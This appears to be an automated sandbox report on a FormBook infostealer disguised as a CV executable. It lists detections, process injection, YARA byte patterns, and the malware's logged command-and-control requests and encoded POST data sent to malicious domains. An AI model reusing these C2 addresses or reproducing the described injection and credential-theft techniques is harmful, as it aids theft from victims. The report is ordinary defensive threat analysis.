Windows Analysis Report
Curriculum Vitae Catalina Munoz.exe

Overview

General Information

Sample name:Curriculum Vitae Catalina Munoz.exe
Analysis ID:1447923
MD5:1f690a7d24c0c325d681db7d114520d4
SHA1:cb3b2bcbfac8d1426d1c9c77294bbb8eff766be0
SHA256:af04493ff5e1ece516e1a68ba430e7b280a0bb3a7671433e357612b510ca98fb
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Curriculum Vitae Catalina Munoz.exe (PID: 4048 cmdline: "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe" MD5: 1F690A7D24C0C325D681DB7D114520D4)
    • Curriculum Vitae Catalina Munoz.exe (PID: 4024 cmdline: "C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe" MD5: 1F690A7D24C0C325D681DB7D114520D4)
      • OZCzxhvCDDlUqJnCoH.exe (PID: 400 cmdline: "C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TSTheme.exe (PID: 7500 cmdline: "C:\Windows\SysWOW64\TSTheme.exe" MD5: 6634A157115551E6DDDFB4748C0565FB)
          • OZCzxhvCDDlUqJnCoH.exe (PID: 6704 cmdline: "C:\Program Files (x86)\KCKwxXKNELUkLDUkZEROInBFEZeKPqGTiwKaBoszltkshGXxy\OZCzxhvCDDlUqJnCoH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7720 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2de93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x174d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ab60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1419f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        SourceRuleDescriptionAuthorStrings
        2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2de93:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x174d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2d093:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x166d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            Timestamp:05/27/24-12:34:06.769299
            SID:2855465
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: Curriculum Vitae Catalina Munoz.exeAvira: detected
            Source: http://www.duobao698.com/ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0YAvira URL Cloud: Label: malware
            Source: http://www.gett.hu/1df8/Avira URL Cloud: Label: malware
            Source: http://www.drdavidglassman.com/61qh/Avira URL Cloud: Label: malware
            Source: http://www.lets-goo.ru/jcz4/Avira URL Cloud: Label: malware
            Source: http://www.duobao698.com/ff4v/Avira URL Cloud: Label: malware
            Source: http://www.drdavidglassman.com/61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0YAvira URL Cloud: Label: malware
            Source: http://www.lets-goo.ru/jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0YAvira URL Cloud: Label: malware
            Source: duobao698.comVirustotal: Detection: 5%Perma Link
            Source: gett.huVirustotal: Detection: 5%Perma Link
            Source: http://www.drdavidglassman.com/61qh/Virustotal: Detection: 7%Perma Link
            Source: http://www.duobao698.com/ff4v/Virustotal: Detection: 5%Perma Link
            Source: Curriculum Vitae Catalina Munoz.exeReversingLabs: Detection: 63%
            Source: Curriculum Vitae Catalina Munoz.exeVirustotal: Detection: 56%Perma Link
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Curriculum Vitae Catalina Munoz.exeJoe Sandbox ML: detected
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Curriculum Vitae Catalina Munoz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000000.1377872255.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662366685.0000000000B2E000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: TSTheme.pdb source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Curriculum Vitae Catalina Munoz.exe, Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, TSTheme.exe, 0000000F.00000003.1457676756.0000000004D79000.00000004.00000020.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000003.1459524541.0000000004F20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: TSTheme.pdbGCTL source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 0000000E.00000002.3661296507.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_02FDBE90 FindFirstFileW,FindNextFileW,FindClose,15_2_02FDBE90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 4x nop then jmp 07891CE1h0_2_07891317
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 4x nop then xor eax, eax15_2_02FC96D0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 4x nop then pop edi15_2_02FD23FD

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49710 -> 124.156.151.111:80
            Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /y4a0/?4h=SNHD3K3PParXHnkwUXmJyoZGSKzPVxiMFdor0NFDe3qARdFDsr6bi2Hm1bNI3aFCJ45VE8SHGaBHgDSe2Sonpz6bDHAjQ/z+aswAPE+xiOEsS724wCH7dMecgb+s+6E26U1cI5uvI0Mp&623=YLI8v8eXd0Y HTTP/1.1Host: www.crxwdix.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /1df8/?4h=HKzVUqf1aEuVi+2sXpcO0QRiAr3gocmC4R78U/lSG5GPWeqrEM/dj7KCi/m7j8wlbFRbxXaftyt8S80LR8LDtnhaMK2/eM8I7y9bqMxgYhPG1v0QEsNv7Olz+oqDA3TDqZmGkZkE9/dY&623=YLI8v8eXd0Y HTTP/1.1Host: www.gett.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /jcz4/?4h=WdxcKFuQ7mYOQBn+p/nyxXlogtPhyiv1qK8yWbAPdcz8dy7KnvGu92vbpUccmm37j4MpRjiQV1qWt/RV+FnqAomjDZURMhccC9NzYUb/SGoQANKT0/qbRrolcopRkFHPlXwp4+ZNAZOj&623=YLI8v8eXd0Y HTTP/1.1Host: www.lets-goo.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /o2z4/?4h=o4btfdz60D114qnlpPkAL4ysHPNnnpnlNvMaE18djeqdyh8JxI4to+dkcTQv5jDwTFNUiMSIZUwmUqoSbZzkAVBLptEej4dkSw0Rp5qMw46dSxiTGxGYdrzYQnQsEiM3dvL1u5YQIt8O&623=YLI8v8eXd0Y HTTP/1.1Host: www.emgeecontracting.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /ff4v/?4h=LVfH/OXwoF79o2r68Z//edB1CD2wHwJvvAzVR8ioN4kZT9t7ttcPOR+uxhJHzze41PCTSWmMujBUW/EaEzEZD5zZNBA7OVz8Vpr8h3iEYlpLT06Bb1IAlYNp8C2ydDS2jK3yMNhnhgns&623=YLI8v8eXd0Y HTTP/1.1Host: www.duobao698.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /61qh/?4h=3koAA3SOIywIBRC3td/m9uAOoJ2vUr08254YEzy+UHnBLa5Tf1e0Y2d1G2geOsid5v6Dlmz0jNB7DtbaJOUrRYZ3Loo9fHLeEOQbNs9kRl4b14/G3iavBmGoo3V0HXEiPICNmWgJ3+Za&623=YLI8v8eXd0Y HTTP/1.1Host: www.drdavidglassman.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /faug/?4h=gQ1rcTKRTEdEYijsQ7RFFauKs4+hYTESjtLv7rh/BlgU+Ddcsh0s2+qhlb94LlvEhZt7Uc7VfShGPHZ40PDTJ1kF4z42d0MBHK6AIRS14RYMt5cJ4UQYX3B6sCkK/z4FUX6qhl+TCqln&623=YLI8v8eXd0Y HTTP/1.1Host: www.friendsfavorites.petAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /arkx/?4h=izrOBqjDGn6K81VAqiLvdxq7h8n9iXY4J1uyWiaqUuNHOvNf2Hoypk/h4at0tdb9bQxTH+Zf8GFGMv9cn3TC2h6uZHILfUjXpIKlVyIf/DctIe5AU17J5zebd8IAEKXGkCDEtoBzkAdY&623=YLI8v8eXd0Y HTTP/1.1Host: www.featuringnature.deAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /nsxv/?4h=pYuJRq+8cLDcL7HBjbC+/g/Mh4BWEuLgiK2rXGhb3IwhxBD1Y9l6lru26CW/IEGwQ6X80EHXbCPAETHU89p1owS3Fy9cgcx9jNYuN7s7s2Oj/CYEgsKi16b0MMZfzW5XOEPuTfm+FgSa&623=YLI8v8eXd0Y HTTP/1.1Host: www.kohfour.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /sdqf/?4h=/Um9ojVdkbfnISaoGVsuQzSOUzKaaLgSbEiIsV4+zKdo/XoiJWjCg4n0fCMWfuuxI3x/+HlmtSdoreUzjia5ktzQg+QfuhD9Tyqg/FbSK60Z9xhxRrThQnyA3fP8fU7MydtKBAbYK1CU&623=YLI8v8eXd0Y HTTP/1.1Host: www.getmall.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /yfa0/?4h=0WhDsKDlEsw2U2hGDN8VHtGa3OHmwnAep36jQbkxMA/yUt9OY1uk5sHeApFDjZn3CMzAWurlvftixp+c+vBUGrqZNxyLTULtMs5Dxygy6ogz213YpKfivi2Kz6VhB8QL1f0m+iF6WOns&623=YLI8v8eXd0Y HTTP/1.1Host: www.uqdr.cnAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA+OY5sgrADNPU0JrQkM0waXTw1UtcTvO26zHEpWIbySxhuqYeEN75iL48Y+nSKxcRhJvbqJM0ozumkczTZ0r6h/7BELTqwTup5gX3mE&623=YLI8v8eXd0Y HTTP/1.1Host: www.kernelphysics.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /zxqv/?4h=OundE2exmel4zoR2h8DaiP5rA6rWpfsTmCodHa3wAeftE7HOQeIovEJMwiGRwn5EG1Ay+Vr7sNzWsvI7Z9ouBjSqQ9kX1TTXpDayR3bilNm8LgIuib/ea4tO/6BxMsTG0spQdKgoBIvM&623=YLI8v8eXd0Y HTTP/1.1Host: www.theppelin.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /xvcs/?4h=C9I48TAnIDWUJjArfDMWJdViUh6nNPGow05e1uC1tfhZsbhFFmHmX4wCjHXOtJR+EmF88tR6GQ9yogFnvhAEpy/ktKFnGfRg/4wLMWSu7Ir3MPWPBJr4ouRSVqpeqHbqcPt/HmBjByDG&623=YLI8v8eXd0Y HTTP/1.1Host: www.botcsllc.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: global trafficHTTP traffic detected: GET /wy0r/?4h=WzjQ5Lku/CcVmfYMLh2se4NW5p5EcwqyA3YiOMIwT77nsakaLKShRywTCni07+Ypglha0We7/XFNEOgzZwpW0Iau+HgTJhKyqKoR5usZjmbjCMnZJqH26R2XpANM+dd2J9nsS8vZ76/r&623=YLI8v8eXd0Y HTTP/1.1Host: www.shengniu.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
            Source: global trafficDNS traffic detected: DNS query: www.crxwdix.store
            Source: global trafficDNS traffic detected: DNS query: www.gett.hu
            Source: global trafficDNS traffic detected: DNS query: www.lets-goo.ru
            Source: global trafficDNS traffic detected: DNS query: www.emgeecontracting.shop
            Source: global trafficDNS traffic detected: DNS query: www.duobao698.com
            Source: global trafficDNS traffic detected: DNS query: www.drdavidglassman.com
            Source: global trafficDNS traffic detected: DNS query: www.friendsfavorites.pet
            Source: global trafficDNS traffic detected: DNS query: www.featuringnature.de
            Source: global trafficDNS traffic detected: DNS query: www.kohfour.com
            Source: global trafficDNS traffic detected: DNS query: www.getmall.online
            Source: global trafficDNS traffic detected: DNS query: www.uqdr.cn
            Source: global trafficDNS traffic detected: DNS query: www.kernelphysics.com
            Source: global trafficDNS traffic detected: DNS query: www.theppelin.online
            Source: global trafficDNS traffic detected: DNS query: www.botcsllc.com
            Source: global trafficDNS traffic detected: DNS query: www.shengniu.com
            Source: unknownHTTP traffic detected: POST /1df8/ HTTP/1.1Host: www.gett.huAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.gett.huConnection: closeContent-Length: 215Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.gett.hu/1df8/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/6.1.6 Safari/537.78.2Data Raw: 34 68 3d 4b 49 62 31 58 63 7a 32 62 30 61 71 74 59 47 77 53 62 49 55 75 43 67 58 48 72 7a 44 73 38 69 45 37 42 76 6b 5a 4d 70 41 50 65 62 63 57 4b 61 4d 58 62 37 35 6c 4c 57 67 2b 39 4f 44 73 74 63 32 42 32 4a 6a 78 46 4b 6c 77 53 6f 49 4a 76 51 6c 52 35 33 36 77 45 64 52 4d 49 71 59 63 65 49 30 32 56 35 73 30 75 46 66 47 77 2b 51 79 59 6f 55 43 2f 74 6f 79 76 42 32 38 64 50 36 58 31 65 6e 74 73 7a 56 73 37 4d 4e 6f 63 64 65 74 6a 4f 57 7a 59 63 5a 7a 63 4b 4f 31 4a 55 67 69 46 36 62 6b 53 4b 42 59 75 57 4d 30 49 2f 54 53 52 38 59 42 6c 67 5a 73 4c 7a 72 5a 56 72 5a 6d 68 65 57 79 77 74 45 36 78 43 34 31 73 6c 33 38 6c 34 37 2b 77 3d 3d Data Ascii: 4h=KIb1Xcz2b0aqtYGwSbIUuCgXHrzDs8iE7BvkZMpAPebcWKaMXb75lLWg+9ODstc2B2JjxFKlwSoIJvQlR536wEdRMIqYceI02V5s0uFfGw+QyYoUC/toyvB28dP6X1entszVs7MNocdetjOWzYcZzcKO1JUgiF6bkSKBYuWM0I/TSR8YBlgZsLzrZVrZmheWywtE6xC41sl38l47+w==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:34:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: Content-Type,Access-Token,Appid,Secret,Authorization,TokenData Raw: 30 0d 0a 0d 0a Data Ascii: 0
